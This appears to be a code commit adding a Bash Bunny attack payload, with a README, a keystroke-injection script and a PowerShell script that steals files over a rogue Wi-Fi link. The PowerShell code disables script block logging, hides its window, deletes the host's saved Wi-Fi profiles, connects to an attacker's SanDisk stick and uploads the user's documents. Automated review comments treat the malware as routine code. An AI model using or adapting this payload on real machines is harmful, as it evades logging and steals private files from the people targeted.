SanDisk Wireless Stick Exfiltration (#445)
Uses the "SanDisk Wireless Stick" for file exfiltration. 1) Avoids "PowerShell Script Block Logging". 2) Hides the "PowerShell" window. 3) Deletes Wi-Fi connection profiles in automatic mode; each deletion causes a disconnection. 4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode. 5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached; if not, automatically starts again. 6) Exfiltrates the files via the HTTP channel.pull/482/head
parent
49f7018bf3
commit
5d4367787f
|
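--- a/PATH-NOT-SHOWN-ON-PAGE.md
+++ b/PATH-NOT-SHOWN-ON-PAGE.md
@@ -0,0 +1,40 @@
+# Files Exfiltration with "SanDisk Wireless Stick"
+
+- Title: "SanDisk Wireless Stick" Exfiltration
+- Author: TW-D
+- Version: 1.0
+- Target: Microsoft Windows 10
+- Category: Exfiltration
+
+## Description
+
+Uses the "SanDisk Wireless Stick" for files exfiltration.
+1) Avoids "PowerShell Script Block Logging".
+2) Hide "PowerShell" window.
+3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
+4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
+5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
+6) Exfiltration of the files via the HTTP channel.
+
+## Configuration
+
+In the web interface of the "SanDisk Wireless Stick" after update, change the following values :
+
+![SanDisk-Configuration.png](./assets/SanDisk-Configuration.png)
+
+From "payload.txt" change the values of the following constants :
+```bash
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+readonly SANDISK_SSID="HAK5-EXFIL"
+readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
+readonly SANDISK_LOOT="loots"
+readonly USER_DIRECTORY="~\\"
+readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
+
+```
+
+## Link
+[SanDisk Vendor](https://www.sandisk.com/goto/connect)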
Binary file not shown.
After Width: | Height: | Size: 22 KiB |
|
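--- a/payload.ps1
+++ b/payload.ps1
@@ -0,0 +1,159 @@
+#
+# Author: TW-D
+# Version: 1.0
+#
+
+param (
+[string] $SSID,
+[string] $PSK,
+[string] $LOOT,
+[string] $DIRECTORY,
+[string] $EXTENSION
+)
+
+# Avoids "PowerShell Script Block Logging".
+#
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+If ($SSID -And $PSK -And $LOOT -And $DIRECTORY -And $EXTENSION) {
+
+# Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
+#
+$interface_guid = (Get-NetAdapter -Physical -Name "Wi-Fi" | WHERE Status -eq "Up").InterfaceGuid
+If ($interface_guid) {
+$wlan_service_path = "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\${interface_guid}\"
+$wlan_service_items = Get-ChildItem -Path $wlan_service_path -Recurse
+$wlan_service_items | ForEach-Object {
+[xml] $xml_content = Get-Content -Path $_.FullName
+$mode = $xml_content.WLANProfile.connectionMode
+$name = $xml_content.WLANProfile.name
+If ($mode -eq "auto") {
+(NETSH WLAN DELETE PROFILE name="$name") | Out-Null
+}
+}
+}
+
+# Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
+#
+$profile_guid = "{" + [guid]::NewGuid().ToString() + "}"
+$profile_path = "${env:TEMP}\${profile_guid}.xml"
+$ssid_hex = ($SSID.ToCharArray() | ForEach-Object { [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($_)) })
+@"
+<?xml version="1.0"?>
+<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
+<name>${SSID}</name>
+<SSIDConfig>
+<SSID>
+<hex>${ssid_hex}</hex>
+<name>${SSID}</name>
+</SSID>
+</SSIDConfig>
+<connectionType>ESS</connectionType>
+<connectionMode>auto</connectionMode>
+<MSM>
+<security>
+<authEncryption>
+<authentication>WPA2PSK</authentication>
+<encryption>AES</encryption>
+<useOneX>false</useOneX>
+</authEncryption>
+<sharedKey>
+<keyType>passPhrase</keyType>
+<protected>false</protected>
+<keyMaterial>${PSK}</keyMaterial>
+</sharedKey>
+</security>
+</MSM>
+<MacRandomization xmlns="http://www.microsoft.com/networking/WLAN/profile/v3">
+<enableRandomization>false</enableRandomization>
+</MacRandomization>
+</WLANProfile>
+"@ | Out-File -FilePath "${profile_path}"
+
+(NETSH WLAN ADD PROFILE filename="${profile_path}") | Out-Null
+Remove-Item -Path "${profile_path}" -Force
+
+# Checks whether the Wi-Fi interface is connected to the "SanDisk".
+# Whether the gateway can be reached.
+# If not, automatically starts again.
+#
+While ($TRUE) {
+$ConnectionError = $NULL
+Try {
+(NETSH WLAN CONNECT name="$SSID") | Out-Null
+$wifi_connected = (Get-NetConnectionProfile).Name
+$gateway_address = (Get-NetRoute -DestinationPrefix 0.0.0.0/0 | Select-Object -ExpandProperty NextHop)
+$gateway_reachable = (Test-Connection -ComputerName $gateway_address -Quiet)
+If ($wifi_connected -eq $SSID -And $gateway_reachable) {
+Break
+}
+} Catch {
+$ConnectionError = $_
+Start-Sleep -Seconds 8
+}
+}
+
+#
+# Exfiltration of the files via the HTTP channel.
+#
+
+Function Invoke-CustomRequest($Url, $Method) {
+$RequestError = $NULL
+Try {
+$request = [System.Net.WebRequest]::Create($Url)
+$request.Method = $Method
+$request.GetResponse().Close()
+} Catch {
+$RequestError = $_
+return $FALSE
+}
+return $TRUE
+}
+
+Function Invoke-UploadRequest($Url, $File) {
+$RestError = $NULL
+Try {
+$empty = [String]::IsNullOrWhiteSpace((Get-Content -Path $File))
+If (!$empty) {
+Invoke-RestMethod -Uri $Url -Method PUT -InFile $File
+}
+} Catch {
+$RestError = $_
+}
+}
+
+Function Exfiltration-Files($Directory, $Extension, $Url) {
+$files = Get-ChildItem -Path $Directory -Include ($Extension.split(",")) -Recurse
+ForEach ($file in $files) {
+$random = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_} ) )
+$basename = Split-Path -Path "${file}" -Leaf -Resolve
+Invoke-UploadRequest -Url "${Url}${random}-${basename}" -File "${file}" | Out-Null
+}
+}
+
+$sandisk_loot = "http://${gateway_address}/myconnect/${LOOT}/"
+
+$check_loot = Invoke-CustomRequest -Url $sandisk_loot -Method "GET"
+If ($check_loot) {
+Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
+} Else {
+Invoke-CustomRequest -Url $sandisk_loot -Method "MKCOL" | Out-Null
+Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
+}
+
+# Cleanup
+#
+(NETSH WLAN DELETE PROFILE name="$SSID") | Out-Null
+Exit
+
+}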
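Review bot: `$ConnectionError`, `$RequestError` and `$RestError` are assigned in the three Catch blocks but never read, so each Try/Catch silently discards the exception without saying so; drop the dead stores or mark the intent, e.g. `# intentional: swallow the error and retry after the sleep` in the `While ($TRUE)` loop and `# intentional: a failed upload is skipped` in Invoke-UploadRequest. The ForEach-Object loop under `If ($interface_guid)` deletes every profile with `connectionMode` "auto" stored for the Wi-Fi interface, while the `# Cleanup` block only removes the profile this script added, so the header comment should state that the host's original profiles are not restored. The generated profile XML also writes the passphrase with `<protected>false</protected>` into `%TEMP%`; a short comment that the file holds the key in clear text until `Remove-Item` runs would make that side effect visible to whoever maintains this.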
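--- a/payload.txt
+++ b/payload.txt
@@ -0,0 +1,74 @@
+#!/bin/bash
+#
+# Title: SanDisk Wireless Stick Exfiltration
+#
+# Description: Files Exfiltration with "SanDisk Wireless Stick"
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Exfiltration
+# Target: Microsoft Windows 10
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# SanDisk Wireless Stick 16Go/32Go - Firmware 4.1.0 (2050)
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+readonly SANDISK_SSID="HAK5-EXFIL"
+readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
+readonly SANDISK_LOOT="loots"
+readonly USER_DIRECTORY="~\\"
+readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 5000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 3500
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -SSID \"${SANDISK_SSID}\" -PSK \"${SANDISK_PSK}\" -LOOT \"${SANDISK_LOOT}\" -DIRECTORY \"${USER_DIRECTORY}\" -EXTENSION \"${FILE_EXTENSION}\""
+Q ENTER
+Q DELAY 1500
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0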
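Review bot: The five `readonly` constants under `######## INITIALIZATION ########` are the only values a user is expected to edit, yet nothing in the file says so or that `SANDISK_SSID` and `SANDISK_PSK` must match what was set in the stick's web interface; a one-line comment above them such as `# Edit these to match the stick's configuration (see README, "Configuration")` would close that gap. `SANDISK_PSK` is a plaintext Wi-Fi passphrase committed in the script and the shipped value reads like a real secret, so the header should state that it is an example to be replaced. All five values are also typed verbatim into the `.\payload.ps1` command line by the `Q STRING` in STAGE3, so they are visible in the spawned PowerShell process's command line on the host; that is inherent to the HID approach but worth documenting next to the constants.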